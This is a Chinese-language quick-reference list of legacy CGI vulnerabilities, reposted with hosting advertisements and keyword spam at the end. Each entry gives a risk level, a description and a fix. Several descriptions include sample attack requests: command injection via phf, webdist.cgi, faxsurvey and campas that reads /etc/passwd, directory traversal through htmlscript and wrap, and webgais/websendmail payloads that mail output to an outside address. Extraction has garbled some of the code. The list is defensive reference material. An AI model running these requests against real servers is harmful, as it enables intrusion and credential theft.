建议cgi 安全漏洞资料速查

安全漏洞  时间:2021-02-09  阅读:()

CGI安全漏洞资料速查

日期 2003年10月10日

类型攻击型

名字 phf

风险等级 中

描述在NCSA或者Apache(1. 1. 1版本以内)非商业版本的WebServer中

有一段程序util.c,允许黑客以root身份执行任何一个指令:http:// www.haixintieyi.com/cgi-bin/phf?Qname=root%0Asome%20command%20here建议无

解决方法把Apache Webserver升级到1. 1. 1以上或者将NCSA Webserver

升级到最新版本

类型攻击型

名字 wguset.exe

风险等级 中

描述如果您使用NT做为您的WebServer的操作系统而且wguest.exe存

在于您的Web可执行目录中的话入侵者将能利用它阅读到您的硬

盘上所有USR_用户能阅读的文件

建议将wguset.exe从你的Web 目录移走或删除

解决方法将wguset.exe从你的Web 目录移走或删除

类型攻击型

名字 rguset.exe

风险等级 中

描述如果您使用NT做为您的WebServer的操作系统而且rguest.exe存

在于您的Web可执行目录中的话入侵者将能利用它阅读到您的硬

盘上所有USR_用户能阅读的文件

建议将rguset.exe从你的Web 目录移走或删除

解决方法将rguset.exe从你的Web 目录移走或删除

类型攻击型

名字 perl.exe

风险等级低

描述在cgi-bin执行目录下存在perl.exe,这属于严重的配置错误。黑客

可以在perl.exe后面加一串指令利用浏览器在server上执行任何

脚本程序

建议 perl.exe是放在任何带执行权限的web 目录下都是不安全的

解决方法在web 目录下移除perl.exe这个程序.

类型攻击型

名字 shtml.exe

风险等级低

描述如果您使用FrontPage作为您的WebServer那么入侵者能够利用

IUSR_用户和shtml.exe入侵您的机器做您不希望的事建议将shtml.exe从你的Web 目录移走或删除

解决方法将shtml.exe从你的Web 目录移走或删除

类型攻击型

名字 wwwb o ar d.p l

风险等级低

描述 wwwb o ar d.p l程序容易引起攻击者对服务器进行D.O.S攻击建议如无必要可以删除该文件

解决方法对get_variables的子程序中的下面这段:if($FORM{\'fol lowup\' } ) {$fol lowup=\"1\";

@fol lowup_num=spl it(/,/, $FORM{\'fol lowup\' } ) ;

$num_fol lowups=@fol lowups=@fol lowup_num;

$last_message=pop(@followups) ;

$origdate=\"$FORM{\'origdate\' }\";

$origname=\"$FORM{\'origname\' }\";

$origsubject=\"$FORM{\'origsubject\' }\"; }

替换为:if($FORM{\'fol lowup\' } ) {

$fol lowup=\"1\";

@fol lowup_num=spl it(/,/, $FORM{\'fol lowup\' } ) ;

$num_fol lowups=@fol lowups=@fol lowup_num;

$last_message=pop(@followups) ;

$origdate=\"$FORM{\'origdate\' }\";

$origname=\"$FORM{\'origname\' }\";

$origsubject=\"$FORM{\'origsubject\' }\";

#WWWBoardBombPat ch

#WrittenBy:SamuelSparlingsparling@slip.net)

$fn=0;whi le($fn<$num_fol lowups)

{

$cur_fup=@followups$fn] ;

$dfn=0;foreach$fm(@followups)

{if(@followups[$dfn]==@followups[$fn]&&$dfn!=$fn)

{

&error(board_bomb) ;

}

$dfn++;

}

$fn++;

}

#EndWWWBoardBombPat ch

}

类型攻击型

名字 uploader.exe

风险等级 中

描述如果您使用NT作为您的WebServer的操作系统,入侵者能够利用uploader.exe上传任何文件

建议将uploader.exe从你的Web目录移走或删除

解决方法将uploader.exe从你的Web目录移走或删除

类型攻击型

名字 bdir.htr

风险等级高

描述如果您使用NT做为您的WebServer的操作系统而且bdir.htr存在于您的Web可执行目录中的话入侵者将能利用它在您的服务器上无止境的创建ODBC数据库并生成一些可执行的文件。

建议将bdir.htr从你的Web目录移走或删除

解决方法将bdir.htr从你的Web目录移走或删除

类型攻击型

名字 Count.cgi

风险等级高

描述在/cgi-bin目录下的Count.cgi程序(wwwcount2.3版本)有一个溢出错误,允许入侵者无须登录而远程执行任何指令。

建议如无必要可以删除该文件

解决方法将www c o u n t升级到2.4或者以上

类型攻击型

名字 test-cgi

风险等级高

描述 test-cgi这个文件可以被入侵者用来浏览服务器上的重要信息建议建议审核cgi-bin目录下的执行程序严格控制访问权限

解决方法删除test-cgi文件

类型攻击型

名字 nph-test-cgi

风险等级高

描述 nph-test-cgi这个文件可以被入侵者用来浏览服务器上的重要信息建议建议审核cgi-bin目录下的执行程序严格控制访问权限

解决方法删除nph-test-cgi文件

类型攻击型

名字 php.cgi

风险等级低

描述 php.cgi程序有较多的漏洞包括缓存溢出漏洞还有导致任何系统文件可以被入侵者读取的漏洞

建议建议审核cgi-bin目录避免有不必要的程序存在

解决方法删除php.cgi程序是最好的办法

类型攻击型

名字 handler

风险等级低

描述 IRIX5.3,6.2,6.3,6.4的/cgi-bin/handler程序存在缓存溢出错误允许入侵者在server上远程执行一段程序:telnettarget.machine.com80

GET/cgi-bin/handler/whatever;cat/etc/passwd|?data=DownloadHTTP/1.0

建议建议审核cgi-bin目录避免有不必要的程序存在

解决方法删除handler文件

类型攻击型

名字 webgais

风险等级高

描述 /cgi-bin 目录下的webgais是GAIS搜索工具的一个接口,它有一个毛病使入侵者可以绕过程序的安全机制执行系统命令:

POST/cgi-bin/webgaisHTTP/1.0

Content-length:85(replacethiswiththeactuallengthofthe\"exploit\"line)telnettarget.machine.com80query=\' ;mail+you\\@your.host建议建议审核cgi-bin目录避免有不必要的程序存在

解决方法删除webgais文件

类型攻击型

名字 websendmail

风险等级高

描述 /cgin-bin目录下的websendmail程序允许入侵者执行一个系统指令:telnettarget.machine.com80

POST/cgi-bin/websendmailHTTP/1.0

Content-length:xxx(shouldbereplacedwiththeactuallengthofthestringpassedtotheserver, inthiscasexxx=90) receiver=;mail+your_address\\@somewhere.org

&content=a

建议建议审核cgi-bin目录避免有不必要的程序存在

解决方法高级用户:编辑websendmail脚本,过滤特殊字符

一般用户删除websendmail文件

类型攻击型

名字 webdist.cgi

风险等级高

描述对于Irix6.2和6.3平台,/cgi-bin目录下的webdist.cgi有一个弱点允许入侵者无须登录而在系统上执行任何指令:http://host/cgi-bin/webdist.cgi?distloc=;cat%20/etc/passwd建议建议审核cgi-bin目录避免有不必要的程序存在

解决方法删除/var/www/cgi-bin/webdist.cgi 目录下的webdist.cgi类型攻击型

名字 faxsurvey

风险等级高

描述在LinuxS.u.S.E上/cgi-bin目录下的faxsurvey程序允许入侵者无须登录就能在服务器执行指令:http://joepc. linux.elsewhere.org/cgi-bin/faxsurvey?/bin/cat%20/etc/passwd

建议建议审核cgi-bin目录避免有不必要的程序存在

解决方法删除/cgi-bin/faxsurvey文件

类型攻击型

名字 htmlscript

风险等级 中

描述安装了htmlscript2.99x或者更早版本的服务器存在一个毛病使入侵者可以查看服务器上的任何文件http://www.vulnerable. server.com/cgi-bin/htmlscript?. ./. ./. ./. ./etc/passwd

建议建议审核cgi-bin目录避免有不必要的程序存在

解决方法删除/cgi-bin/htmlscript脚本文件,或者将htmlscript升级到

3.0以上

类型攻击型

名字 pfdisplay

风险等级 中

描述在Irix6.4或者更早版本的web服务器上 /cgi-bin/pfdisplay程序允许入侵者非法查看服务器上的文件

建议建议审核cgi-bin目录避免有不必要的程序存在

解决方法删除/cgi-bin/pfdisplay文件,或者打补丁补丁可以去sgigate. sgi.com(204.94.209. 1)或者ftp. sgi.com下载:

Fi lename:README.patch.3018

Algorithm#1 (sum-r) :README.patch.3018

Algorithm#2(sum) :README.patch.3018

MD5checksum: 1169EB51D75E0794C64C2C1FD6211B69

Filename:patchSG

Algorithm#1 (sum-r) :patchSG

Algorithm#2(sum) :patchSG

MD5checksum:BD16A53A0AE693D6E9E276EE066BDBC8

Filename:patchSG. idb

Algorithm#1 (sum-r) :patchSG. idb

Algorithm#2(sum) :2512patchSG. idb

MD5checksum: 1CB16E6A8C50BF17CD02A29C2E4D35EB

Filename:patchSG.performer_tools_man

Algorithm#1 (sum-r) :patchSG.per-

-former_tools_man

Algorithm#2(sum) :31448patchSG.performer_t-

-ools_man

MD5checksum:B6B3D90FAB9B5AC3E5AF5A8D29

Filename:patchSG.performer_tools_sw

Algorithm#1 (sum-r) :patchSG.perform-

-er_tools_sw

Algorithm#2(sum) :patchSG.performer_tools_sw

MD5checksum:DF4E8ED8326A6A0B39F7B4D67E5FD71F

类型攻击型

名字 www-s q l

风险等级 中

描述 www-s q l存在于/c g i-b i n/目录下这将导致入侵可以越权访问被保护的文件

建议最好删除www-s q l文件

解决方法 #ifPHPFASTCGIwhile(FCGI_Accept()>=0)

{

#endifs=getenv(\"REDIRECT_STATUS\") ;if(!s) {puts(\"Content-type:text/plain\\r\\n\\r\\nPHP/FIdetectedaninternalerror.Pleaseinformsa@hogia.netofwhatyoujustdid. \\n\") ;exit(1) ;

}s=getenv(\"PATH_TRANSLATED\") ;

类型攻击型

名字 view-source

风险等级高

描述在cgi-bin目录下的view-source程序没有对输入进行安全检查使入侵者可以查看服务器上的任何文件

建议建议审核cgi-bin目录避免有不必要的程序存在

解决方法删除/cgi-bin目录下的viewsource程序

类型攻击型

名字 c ampa s

风险等级高

描述在cgi-bin目录下的campas程序有一个毛病可以使入侵者随意查看server上的重要文件:telnetwww.xxxx.net80

Trying200.xx.xx.xx. . .

Connectedtovenus.xxxx.net

Escapecharacteris\' ^]\' .

GET/cgi-bin/campas?%0acat%0a/etc/passwd%0a

建议建议审核cgi-bin目录避免有不必要的程序存在

解决方法删除/cgi-bin目录下的campas程序

类型攻击型

名字 aglimpse

风险等级高

描述在cgi-bin目录下的aglimpse程序有一个毛病可以使入侵者无须登录而随意执行任何指令

建议建议审核cgi-bin目录避免有不必要的程序存在

解决方法删除/cgi-bin目录下的aglimpse程序

类型攻击型

名字 AT-admin.cgi

风险等级 中

描述在ExciteforWebServers1. 1上的/cgi-bin/AT-admin.cgi程序允许普通用户完全控制整个系统

建议建议审核cgi-bin目录避免有不必要的程序存在

解决方法删除/cgi-bin目录下的AT-admin.cgi程序

类型攻击型

名字 finger

风险等级 中

描述这个位于/cgi-bin下的finger程序可以查看其它服务器的信息但是如果将参数改成本机本机上的帐号信息将暴露无遗:

/cgi-bin/finger?@localhost

建议建议审核cgi-bin目录避免有不必要的程序存在

解决方法删除/cgi-bin目录下的finger程序

类型攻击型

名字 webwho.pl

风险等级 中

描述如果在您的Web可执行目录中有webwho.pl这个CGI脚本那么入侵者将能利用他阅读启动Web的用户能读写执行的任何文件。

建议将webwho.p l从您的Web目录中删除或移走

解决方法将webwho.pl从您的Web目录中删除或移走

类型攻击型

名字 w3-msql

风险等级低

描述 MiniSQL软件包发行版本附带的一个CGI w3-msql可被用于以httpd的uid权限执行任意代码。这个安全漏洞是由程序中的scanf() 函数引起的。

建议如果您安装了MiniSQL软件包,请您将/cgi-bin/ 目录下的w3-msql文件删除或移走

解决方法如果您安装了MiniSQL软件包,请您将/cgi-bin/目录下的w3-msql

文件删除或移走或使用以下补丁。

补丁

------w3-msql.patch---------

410c410scanf(\"%s\",boundary) ; <br>---

<scanf(\"%128s\",boundary) ;>

418c418

<strcat(var,buffer) ;

<strncat(var,buffer, sizeof(buffer) ) ;

428c428

<scanf(\"Content-Type:%s\",buffer) ;>

<scanf(\"Content-Type:%15360s\",buffer) ;>

------w3-msql.patch---------

类型攻击型

名字 NetscapeFastTrackserver2.0. 1a

风险等级 中

描述 UnixWare7. 1附带的NetscapeFastTrackserver2.0. 1a存在一个远程缓冲区溢出漏洞。缺省地监听457端口的ht tpd通过ht tp协议提供UnixWare文档。如果向该服务器传送一个长度超过367字符的GET请求会使缓冲区溢出 EIP值被覆盖将可能导致任意代码以httpd权限执行。

建议临时解决方法是关闭NetscapeFastTrack服务器

解决方法临时解决方法是关闭NetscapeFastTrack服务器。

类型攻击型

名字 AnyForm.cgi

风险等级高

描述位于cgi-bin目录下的AnyForm.cgi程序是用于简单表单通过邮件

传递响应的,但该程序对用户输入检查不彻底可被入侵者利用在server上执行任何指令.

建议建议审核cgi-bin目录避免有不必要的程序存在

解决方法建议升级该cgi程序,或者删除该文件

类型攻击型

名字 whois.cgi

风险等级低

描述在多个WebServer中带有的Whois.cgi存在溢出漏洞。它们包括WhoisInternicLookup-version: 1.02

CCWhois-Version: 1.0

Matt\' sWhois-Version: 1

他们将使入侵者能够在您的系统上使用启动httpd用户的权限执行任意的代码

建议将在您Web目录中问whois.cgi删除或移走

解决方法将在您Web目录中问whois.cgi删除或移走

类型攻击型

名字 environ.cgi

风险等级 中

描述在Apachewebserver或者IIS等其它webserver的/cgi-bin/environ.cgi程序,有一个毛病允许入侵者绕过安全机制浏览服务器上的一些文件。

建议建议审核cgi-bin目录避免有不必要的程序存在

解决方法建议升级该cgi程序,或者删除该文件

类型攻击型

名字 wrap

风险等级 中

描述 /cgi-bin/wrap程序有两个漏洞均允许入侵者获取服务器上文件的非法访问,如:http://host/cgi-bin/wrap?/. ./. ./. ./. ./. ./etc

建议建议审核cgi-bin目录避免有不必要的程序存在

解决方法删除/cgi-bin/wrap文件

类型攻击型

名字 edit.pl

风险等级 中

描述 /cgi-bin/edit.pl有一个安全弱点,用下面这条命令就可以访问用户的配置情况:http://www. sitetracker.com/cgi-bin/edit.pl?account=&password=建议建议审核cgi-bin目录避免有不必要的程序存在

解决方法删除/cgi-bin/edit.pl文件

RAKsmart:美国洛杉矶独服,E3处理器/16G/1TB,$76.77/月;美国/香港/日本/韩国站群服务器,自带5+253个IPv4

RAKsmart怎么样?RAKsmart机房即日起开始针对洛杉矶机房的独立服务器进行特别促销活动:低至$76.77/月,最低100Mbps带宽,最高10Gbps带宽,优化线路,不限制流量,具体包括有:常规服务器、站群服务器、10G大带宽服务器、整机机柜托管。活动截止6月30日结束。RAKsmart,美国华人老牌机房,专注于圣何塞服务器,有VPS、独立服务器等。支持PayPal、支付宝付款。点击直达...

VoLLcloud:超便宜香港CMI大带宽vps-三网CMI直连-年付四免服务-低至4刀/月-奈飞

vollcloud LLC创立于2020年,是一家以互联网基础业务服务为主的 技术型企业,运营全球数据中心业务。致力于全球服务器租用、托管及云计算、DDOS安 全防护、数据实时存储、 高防服务器加速、域名、智能高防服务器、网络安全服务解决方案等领域的智 能化、规范化的体验服务。所有购买年付产品免费更换香港原生IP(支持解锁奈飞),商家承诺,支持3天内无条件退款(原路退回)!点击进入:vollclo...

UCloud:全球大促降价,云服务器全网最低价,1核1G快杰云服务器47元/年

ucloud:全球大促活动降价了!这次云服务器全网最低价,也算是让利用户了,UCloud商家调低了之前的促销活动价格,并且新增了1核1G内存配置快杰型云服务器,价格是47元/年(也可选2元首月),这是全网同配置最便宜的云服务器了!UCloud全球大促活动促销机型有快杰型云服务器和通用型云服务器,促销机房国内海外都有,覆盖全球20个城市,具体有北京、上海、广州、香港、 台北、日本东京、越南胡志明市、...

安全漏洞为你推荐
arm开发板新手入门应如何选择 ARM 开发板?安卓应用平台手机系统应用在哪办公协同软件求一款国内知名的OA办公软件,谁知道有哪些呢?蘑菇街美丽说蘑菇街美丽说唯品会天猫京东。女生买衣服,哪个好小米手柄小米手柄和飞智手柄哪个好?freebsd安装FreeBSD系统NetBSD系统OpenBSD系统 这三个系统安装方法相似吗?用什么方法装哦?手工杀毒怎样不用杀毒软件自己手动查毒?淘宝软文范例淘宝上写软文的技巧关闭qq相册图标怎么关闭QQ空间跟QQ相册的图标?建立网站建立网站的步骤
高防服务器租用选锐一 工信部域名备案 金万维动态域名 highfrequency gitcafe iis安装教程 警告本网站 云全民 135邮箱 hdd metalink 爱奇艺vip免费领取 银盘服务是什么 申请网站 google台湾 西安服务器托管 河南移动梦网 国外在线代理服务器 qq金券 申请免费空间 更多